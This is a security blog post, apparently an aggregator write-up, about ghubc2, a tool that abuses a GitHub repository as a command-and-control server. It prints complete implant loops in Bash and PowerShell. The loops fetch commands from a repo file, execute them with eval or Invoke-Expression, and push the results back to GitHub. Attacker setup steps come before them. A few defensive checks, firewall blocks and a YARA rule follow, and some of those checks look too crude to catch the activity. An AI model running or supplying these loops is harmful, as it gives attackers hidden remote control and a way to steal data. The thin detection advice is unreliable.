Using GitHub as a Command-and-Control (C2) Server with ghubc2

By /

Listen to this Post

Featured Image
The tool ghubc2 demonstrates how GitHub can be exploited as a Command-and-Control (C2) server for remote command execution. This script uses a GitHub repository to send commands to a compromised machine and retrieve the output.

How It Works:

  1. Command Dispatch: The attacker updates `sender.txt` in the GitHub repo with a command.
  2. Victim Execution: The victim machine periodically checks sender.txt, executes the command, and uploads the output to resver.txt.
  3. Exfiltration: The attacker reads `resver.txt` to view command results.

GitHub Repository: ghubc2 GitHub Link

You Should Know:

  1. Setting Up a GitHub C2 (For Ethical Testing) 
    Clone the repository 
git clone https://github.com/attacker/repo.git 
cd repo

Create command and output files 
echo "whoami" > sender.txt 
touch resver.txt

Push to GitHub 
git add . 
git commit -m "Initial C2 setup" 
git push origin main

2. Simulating the Victim Machine (Linux)

while true; do 
git pull origin main 
if [ -s sender.txt ]; then 
command=$(cat sender.txt) 
eval "$command" > resver.txt 
git add resver.txt 
git commit -m "Command output" 
git push origin main 
echo "" > sender.txt 
git add sender.txt 
git commit -m "Reset sender" 
git push origin main 
fi 
sleep 30 
done

3. Detecting GitHub C2 Activity (Defensive)

 Monitor suspicious git processes 
ps aux | grep -i "git pull"

Check cron jobs for automated git pulls 
crontab -l

Inspect network connections to GitHub 
netstat -tulnp | grep -i "git"

4. Windows Equivalent (PowerShell)

while ($true) { 
git pull origin main 
if (Get-Content -Path "sender.txt" -ErrorAction SilentlyContinue) { 
$command = Get-Content -Path "sender.txt" 
Invoke-Expression $command | Out-File -FilePath "resver.txt" 
git add resver.txt 
git commit -m "Command output" 
git push origin main 
Clear-Content -Path "sender.txt" 
git add sender.txt 
git commit -m "Reset sender" 
git push origin main 
} 
Start-Sleep -Seconds 30 
}
  1. Blocking GitHub C2 in a Corporate Environment 
    Block GitHub domains via firewall 
iptables -A OUTPUT -p tcp -d github.com --dport 443 -j DROP 
iptables -A OUTPUT -p tcp -d githubusercontent.com --dport 443 -j DROP

Monitor for git-based exfiltration 
grep -r "git pull" /var/log/

What Undercode Say:

GitHub-based C2 attacks are stealthy because they blend in with legitimate traffic. Defenders must:
– Monitor automated `git` processes.
– Restrict outbound connections to GitHub in sensitive environments.
– Use YARA rules to detect malicious scripts.

 Example YARA rule for ghubc2 detection 
rule GitHub_C2 { 
strings: 
$git_pull = "git pull origin main" 
$sender_txt = "sender.txt" 
$resver_txt = "resver.txt" 
condition: 
all of them 
}

Expected Output:

A functioning GitHub C2 channel for red team exercises or a detected & mitigated attack in defensive scenarios.

Prediction:

GitHub-based C2 attacks will rise due to their low detection rate. Enterprises will enforce stricter git access controls and behavioral monitoring to counter such threats.

Reference:

IT/Security Reporter URL:

Reported By: Mohamedshahat Shiky – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: